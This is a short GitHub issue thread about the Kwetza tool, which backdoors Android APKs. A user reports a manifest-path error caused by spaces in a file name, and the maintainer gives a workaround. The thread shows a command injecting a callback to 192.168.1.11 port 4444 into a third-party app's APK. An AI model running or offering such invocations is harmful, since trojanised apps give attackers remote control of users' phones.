### ISSUE TITLE
!!! ERROR IN 'parseAndroidManifext' method

### ISSUE THREAD

**Issue by Josue198s** [sensepost/kwetza#15]
The manifest file cant be found. 

# python kwetza.py Hide\ Photos\ \ Videos\ Vault\ Pro\ v1.0.0\ KatCore.apk  192.168.1.11 4444  yes 
[+] MMMMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 192.168.1.11
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST
!!! ERROR IN 'parseAndroidManifext' method
[Errno 2] No such file or directory: '/root/Desktop/Android_Hack/kwetza/Hide Photos  Videos Vault Pro v1/AndroidManifest.xml'

**Comment by Josue198s** [comment]
that happens due to the spaces in the folder name of the APK.

**Comment by brompwnie** [comment]
Good day,
This appears to be a bug in the script. To workaround this in the meantime, place your target APK in the same directory as Kwetza.py
